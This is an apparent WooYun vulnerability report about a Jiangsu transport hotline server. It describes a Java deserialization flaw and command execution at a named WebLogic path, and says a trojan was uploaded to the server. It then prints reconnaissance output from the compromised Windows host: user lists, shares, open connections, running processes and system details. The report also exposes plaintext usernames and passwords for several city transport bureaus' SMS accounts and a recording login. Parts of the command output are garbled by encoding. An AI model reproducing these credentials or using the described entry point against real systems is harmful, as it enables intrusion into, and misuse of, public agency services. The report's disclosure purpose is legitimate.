乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-15: 厂商已经确认,细节仅向厂商公开 2016-01-25: 细节向核心白帽子及相关领域专家公开 2016-02-04: 细节向普通白帽子公开 2016-02-14: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
地址**.**.**.**:7001/存在“Java 反序列化”漏洞
地址**.**.**.**:7001/jstsh/jsp/xinxwh/user/queryMoreGongd.do?flag=1存在命令执行漏洞
直接上传木马到服务器中
2015/10/2 地区 话务量 咨询 投诉 南京 1137 646 197 无锡 301 147 73 徐州 257 100 58 常州 526 290 103 苏州 1071 680 166 南通 99 49 28 连云港 96 32 22 淮安 142 76 20 盐城 80 71 3 扬州 153 126 4 镇江 19 8 0 泰州 90 38 25 宿迁 86 29 29 总计 4057 2292 728 四个交通局的短信帐号:扬州交通局短信user:yzjtj,pass:yzjtj359连云港交通局短信user:lygjtj,pass:lygjtj361泰州交通局短信user:tzjtj,pass:tzjtj362宿迁交通局短信user:sqjtj,pass:sqjtj363镇江交通局短信 zjjtj/zjjtj357南通短信user:ntjtj,pass:ntjtj358徐州短信xzjtj/xzjtj360常州短信czjtj/czjtj356 100812-江苏省交通局信息配置表(南通、徐州、镇江): 项目编号 356 虚中心号 55 技能号 91 组号 19 监控工号 9356 监控小号码 1400300356 工号 录音用户名/密码 record356/letmein 短信号码 0519-85414001 短信计费号码 02552853222 小号码 DESKPHONE MODELNO 145198569001 3325 145198569002 3772
D:\jstsh_deploy\jstsh\jstsh>whoami============================================================================================================rcz-app\administratorD:\jstsh_deploy\jstsh\jstsh>net user============================================================================================================r\\CZ-APP ���û��ʻ�-------------------------------------------------------------------------------Administrator Guest jstshuser SUPPORT_388945a0 ����ɹ���ɡ�D:\jstsh_deploy\jstsh\jstsh>net share============================================================================================================r������ ��Դ ע��-------------------------------------------------------------------------------H$ H:\ Ĭ�Ϲ��� IPC$ Զ�� IPC G$ G:\ Ĭ�Ϲ��� ADMIN$ C:\WINDOWS Զ�̹��� D$ D:\ Ĭ�Ϲ��� E$ E:\ Ĭ�Ϲ��� C$ C:\ Ĭ�Ϲ��� ����ɹ���ɡ�D:\jstsh_deploy\jstsh\jstsh>net view============================================================================================================r���������� ע��-------------------------------------------------------------------------------\\CTI-SERVER \\CZ-APP \\CZ-DB \\CZKX-48EAB8E2A2 \\GPSDATA \\VIDE-GONGAN ����ɹ���ɡ�D:\jstsh_deploy\jstsh\jstsh>net start============================================================================================================r�Ѿ�������� Windows ����: Application Experience Lookup Service Application Layer Gateway Service Automatic Updates AutoUploadServer Background Intelligent Transfer Service COM+ Event System Computer Browser Cryptographic Services DCOM Server Process Launcher DHCP Client Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Error Reporting Service Event Log Flash Media Administration Server Flash Media Server (FMS) FMSHttpd Help and Support HID Input Service IPSEC Services LogCutterService Logical Disk Manager McAfee Engine Service McAfee Framework ���� McAfee McShield McAfee Task Manager McAfee Validation Trust Protection Service Network Connections Network Location Awareness (NLA) NTSyslog (2nd edition) Plug and Play Print Spooler Protected Storage PublishFlash Remote Access Connection Manager Remote Procedure Call (RPC) Remote Registry Secondary Logon Security Accounts Manager Server Shell Hardware Detection SJServiceMonitor SNMP Service SNMP Trap Service System Event Notification Task Scheduler TCP/IP NetBIOS Helper Telephony Terminal Services User Authentication Manager WFWindowsService3 Windows Firewall/Internet Connection Sharing (ICS) Windows Management Instrumentation Windows Time Wireless Configuration Workstation ����ͬ���ն�����ɹ���ɡ�D:\jstsh_deploy\jstsh\jstsh>netstat -ano============================================================================================================rActive Connections Proto Local Address Foreign Address State PID TCP **.**.**.**:135 **.**.**.**:0 LISTENING 1100 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 836 TCP **.**.**.**:1111 **.**.**.**:0 LISTENING 1968 TCP **.**.**.**:1935 **.**.**.**:0 LISTENING 3148 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 3284 TCP **.**.**.**:6780 **.**.**.**:0 LISTENING 5500 TCP **.**.**.**:8134 **.**.**.**:0 LISTENING 3412 TCP **.**.**.**:8135 **.**.**.**:0 LISTENING 3148 TCP **.**.**.**:17000 **.**.**.**:0 LISTENING 2100 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1240 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:1252 **.**.**.**:7141 CLOSE_WAIT 4764 TCP **.**.**.**:1254 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:1263 **.**.**.**:1521 TIME_WAIT 0 TCP **.**.**.**:1271 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:1283 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:1291 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:1292 **.**.**.**:7141 TIME_WAIT 0 TCP **.**.**.**:1293 **.**.**.**:7141 TIME_WAIT 0 TCP **.**.**.**:1294 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:1295 **.**.**.**:7141 TIME_WAIT 0 TCP **.**.**.**:1296 **.**.**.**:7141 TIME_WAIT 0 TCP **.**.**.**:1297 **.**.**.**:7141 TIME_WAIT 0 TCP **.**.**.**:1298 **.**.**.**:7141 TIME_WAIT 0 TCP **.**.**.**:1299 **.**.**.**:7141 TIME_WAIT 0 TCP **.**.**.**:1300 **.**.**.**:139 TIME_WAIT 0 TCP **.**.**.**:1301 **.**.**.**:7141 TIME_WAIT 0 TCP **.**.**.**:1302 **.**.**.**:7141 TIME_WAIT 0 TCP **.**.**.**:1303 **.**.**.**:7141 ESTABLISHED 4764 TCP **.**.**.**:1313 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:1643 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:1694 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2004 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2338 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2348 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2445 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2505 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2518 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2525 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2526 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2527 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2528 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2553 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2884 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:2933 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:3175 **.**.**.**:1521 ESTABLISHED 2100 TCP **.**.**.**:3395 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:3563 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:3565 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:3747 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:3750 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:3796 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4073 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4096 **.**.**.**:17777 ESTABLISHED 2100 TCP **.**.**.**:4175 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4176 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4183 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4362 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4560 **.**.**.**:7141 CLOSE_WAIT 4764 TCP **.**.**.**:4566 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4602 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4746 **.**.**.**:7141 CLOSE_WAIT 4764 TCP **.**.**.**:4942 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4985 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:4986 **.**.**.**:1521 ESTABLISHED 4764 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 4764 TCP **.**.**.**:7001 **.**.**.**:1262 TIME_WAIT 0 TCP **.**.**.**:7001 **.**.**.**:1272 TIME_WAIT 0 TCP **.**.**.**:7001 **.**.**.**:1288 ESTABLISHED 4764 TCP **.**.**.**:7001 **.**.**.**:1913 ESTABLISHED 4764 TCP **.**.**.**:7001 **.**.**.**:1733 TIME_WAIT 0 TCP **.**.**.**:7001 **.**.**.**:4728 TIME_WAIT 0 TCP **.**.**.**:7001 **.**.**.**:6560 ESTABLISHED 4764 TCP **.**.**.**:7001 **.**.**.**:16068 FIN_WAIT_2 4764 TCP **.**.**.**:7001 **.**.**.**:18117 ESTABLISHED 4764 TCP **.**.**.**:7001 **.**.**.**:29031 TIME_WAIT 0 TCP **.**.**.**:7001 **.**.**.**:34640 ESTABLISHED 4764 TCP **.**.**.**:7001 **.**.**.**:36570 TIME_WAIT 0 TCP **.**.**.**:7001 **.**.**.**:45168 TIME_WAIT 0 TCP **.**.**.**:7001 **.**.**.**:48881 TIME_WAIT 0 TCP **.**.**.**:1029 **.**.**.**:0 LISTENING 3548 TCP **.**.**.**:1035 **.**.**.**:19350 ESTABLISHED 3196 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 4764 TCP **.**.**.**:11110 **.**.**.**:0 LISTENING 1968 TCP **.**.**.**:19350 **.**.**.**:0 LISTENING 3148 TCP **.**.**.**:19350 **.**.**.**:1035 ESTABLISHED 3148 UDP **.**.**.**:161 *:* 1816 UDP **.**.**.**:162 *:* 1844 UDP **.**.**.**:445 *:* 4 UDP **.**.**.**:500 *:* 836 UDP **.**.**.**:4174 *:* 4764 UDP **.**.**.**:4500 *:* 836 UDP **.**.**.**:123 *:* 1244 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:123 *:* 1244 UDP **.**.**.**:1027 *:* 1244D:\jstsh_deploy\jstsh\jstsh>tasklist /svc============================================================================================================rӳ������ PID ���� ========================= ======== ============================================System Idle Process 0 ��ȱ System 4 ��ȱ smss.exe 608 ��ȱ csrss.exe 708 ��ȱ winlogon.exe 780 ��ȱ services.exe 824 Eventlog, PlugPlay lsass.exe 836 PolicyAgent, ProtectedStorage, SamSs svchost.exe 1016 DcomLaunch svchost.exe 1100 RpcSs svchost.exe 1192 Dhcp, Dnscache svchost.exe 1244 LmHosts, W32Time svchost.exe 1260 AeLookupSvc, BITS, Browser, CryptSvc, dmserver, EventSystem, helpsvc, HidServ, lanmanserver, lanmanworkstation, Netman, Nla, RasMan, Schedule, seclogon, SENS, SharedAccess, ShellHWDetection, TrkWks, winmgmt, wuauserv, WZCSVC spoolsv.exe 1652 Spooler msdtc.exe 1680 MSDTC AutoUploadServer.exe 1872 AutoUploadServer DpHost.exe 1892 DpHost svchost.exe 1928 ERSvc FMSMaster.exe 1952 FMS FMSAdmin.exe 1968 FMSAdmin LogCutterService.exe 252 LogCutterService EngineServer.exe 340 McAfeeEngineService FrameworkService.exe 360 McAfeeFramework VsTskMgr.exe 1284 McTaskManager mfevtps.exe 1448 mfevtp NTSyslog.exe 1484 NTSYSLOG PublishFlash.exe 1632 PublishFlash svchost.exe 1708 RemoteRegistry ServiceMonitor.exe 1720 SJServiceMonitor snmp.exe 1816 SNMP snmptrap.exe 1844 SNMPTRAP SyncTerminal.exe 2100 SyncTerminal Mcshield.exe 2304 McShield mfeann.exe 2408 ��ȱ svchost.exe 3284 TermService httpd.exe 3412 FMSHttpd svchost.exe 3460 TapiSrv alg.exe 3548 ALG httpd.exe 3844 ��ȱ FMSEdge.exe 3148 ��ȱ FMSCore.exe 3196 ��ȱ wmiprvse.exe 5280 ��ȱ csrss.exe 5900 ��ȱ winlogon.exe 5928 ��ȱ rdpclip.exe 4932 ��ȱ explorer.exe 5068 ��ȱ shstat.exe 5472 ��ȱ NTSyslogApp.exe 5500 ��ȱ jusched.exe 5508 ��ȱ ctfmon.exe 716 ��ȱ csrss.exe 4992 ��ȱ winlogon.exe 5180 ��ȱ rdpclip.exe 5748 ��ȱ explorer.exe 5820 ��ȱ shstat.exe 6012 ��ȱ NTSyslogApp.exe 6016 ��ȱ jusched.exe 6068 ��ȱ ctfmon.exe 6100 ��ȱ conime.exe 3184 ��ȱ logon.scr 944 ��ȱ cmd.exe 5236 ��ȱ java.exe 4764 ��ȱ naPrdMgr.exe 5080 ��ȱ WFWindowsService3.exe 4760 WFWindowsService3 wmiprvse.exe 7644 ��ȱ tasklist.exe 1468 ��ȱ D:\jstsh_deploy\jstsh\jstsh>ipconfig /all============================================================================================================rWindows IP Configuration Host Name . . . . . . . . . . . . : CZ-app Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : NoEthernet adapter �������� 2: Media State . . . . . . . . . . . : Media disconnected Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) Physical Address. . . . . . . . . : E4-1F-13-B3-A9-A6Ethernet adapter ��������: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2 Physical Address. . . . . . . . . : E4-1F-13-B3-A9-A4 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : **.**.**.** Subnet Mask . . . . . . . . . . . : **.**.**.** Default Gateway . . . . . . . . . : **.**.**.**D:\jstsh_deploy\jstsh\jstsh>systeminfo============================================================================================================r������: CZ-APPOS ����: Microsoft(R) Windows(R) Server 2003, Enterprise EditionOS �汾: 5.2.3790 Service Pack 1 Build 3790OS ������: Microsoft CorporationOS ����: ����������OS ��������: Multiprocessor Freeע���������: ibmע�����֯: ��Ʒ ID: 69813-640-6506524-45145��ʼ��װ����: 2010-9-27, 10:29:09ϵͳ���ʱ��: 75 �� 1 Сʱ 48 �� 9 ��ϵͳ������: IBMϵͳ�ͺ�: IBM System x -[7945I05]-ϵͳ����: X86-based PC������: ��װ�� 4 ���������� [01]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2133 Mhz [02]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2133 Mhz [03]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2133 Mhz [04]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2133 MhzBIOS �汾: IBM - 0Windows Ŀ¼: C:\WINDOWSϵͳĿ¼: C:\WINDOWS\system32����豸: \Device\HarddiskVolume1ϵͳ��������: zh-cn;����(�й�)���뷨��������: ��ȱʱ��: (GMT+08:00) ���������죬����ر�����������³ľ�������ڴ�����: 4,084 MB���õ������ڴ�: 2,401 MBҳ���ļ�: ���ֵ: 1,857 MBҳ���ļ�: ����: 217 MBҳ���ļ�: ʹ����: 1,640 MBҳ���ļ�λ��: c:\pagefile.sys��: WORKGROUP��¼������: \\CZ-APP������: ��װ�� 1 �������� [01]: Q147222����: ��װ�� 2 �� NIC�� [01]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) ������: �������� 2 ״̬: ý���������ж� [02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) ������: �������� ���� DHCP: �� IP ��ַ [01]: **.**.**.**D:\jstsh_deploy\jstsh\jstsh>query user============================================================================================================r �û��� �Ự�� ID ״̬ ����ʱ�� ��¼ʱ�� jstshuser 1 ��Ƭ �� 2015-10-26 11:31>administrator 2 ��Ƭ �� 2015-10-26 11:37D:\jstsh_deploy\jstsh\jstsh>
加强安全意识
危害等级:高
漏洞Rank:11
确认时间:2016-01-15 15:42
CNVD确认未复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.
暂无
